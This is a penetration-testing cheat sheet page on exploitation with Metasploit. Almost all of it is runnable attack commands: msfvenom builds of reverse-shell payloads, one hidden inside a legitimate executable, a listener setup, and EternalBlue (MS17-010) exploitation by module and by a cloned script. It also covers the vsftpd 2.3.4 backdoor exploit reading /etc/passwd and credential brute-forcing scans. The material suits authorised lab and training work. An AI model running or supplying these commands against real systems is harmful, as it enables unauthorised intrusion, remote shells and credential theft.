Exploitation

Metasploit

# Start Metasploit
systemctl start postgresql
systemctl enable postgresql
msfdb init
msfconsole

# Metasploit Modules
Auxiliary:    Scripts for enumeration, scanning, fuzzing, sniffing etc...
Exploits:     Code to exploit the vulnerability and deliver the payload.
Payloads:     The code that executed on the victim.
Encoders:     Encode the payloads to another form.
Post:         Post exploitation scripts.
Nops:         Add nops bytes.
Evasion:      Scripts for evasion.

# Metasploit Commands
help
show {all|exploits|payloads|auxiliary}
search vsftpd
search type:exploit smb
info {ModuleName}
use {ModuleName}
show info | show options
set {Variable} {value}
exploit

# Ex1 SNMP service enumeration
use auxiliary/scanner/snmp/snmp_enum
show info
show options
set rhosts 192.168.1.244
run

# Ex2 SMB version scanning
use auxiliary/scanner/smb/smb_version
info | options
set rhosts 192.168.1.1-254
run

# Ex3 Test FTP anonymous login
use auxiliary/scanner/ftp/ftp_login
info | options
set pass_file /root/pass.txt
set blank_passwords true
set rhosts 192.168.1.0/24
set user_file /root/user.txt
run

Client-Side Attacks

Standalone Payload

# Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f exe > file.exe

# Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f elf > file.elf

# Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -o file.py

# Embedded Inside File
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f exe -x /usr/share/windows-resources/binaries/plink.exe -o embedded.exe

Setup Listener

msfconsole
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> show options
> set LHOST 10.0.2.15
> set LPORT 4444
> exploit

Windows Service Side Attack

Exploit for MS17-010

use exploit/windows/smb/ms17_010_eternalblue
show options | show info
set rhosts 192.168.1.19
show payloads
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.114
exploit

Manual Exploit for MS17-010

https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010
cd shellcode
./shell_prep.sh
cd ..
./listener_prep.sh
python eternalblue_exploit7.py 192.168.1.4 shellcode/sc_all.bin

Linux Service Side Exploit

Exploit for vsftpd 2.3.4

use exploit/unix/ftp/vsftpd_234_backdoor
show options | show info
set rhosts 192.168.1.115
show payloads
set payload cmd/unix/interact
exploit

Manual Exploit for vsftpd 2.3.4

git clone https://github.com/In2econd/vsftpd-2.3.4-exploit
cd vsftpd-2.3.4-exploit
python3 vsftpd_234_exploit.py 192.168.1.115 21 whoami
python3 vsftpd_234_exploit.py 192.168.1.115 21 "cat /etc/passwd"
PreviousScanningNextPost Exploitation

Last updated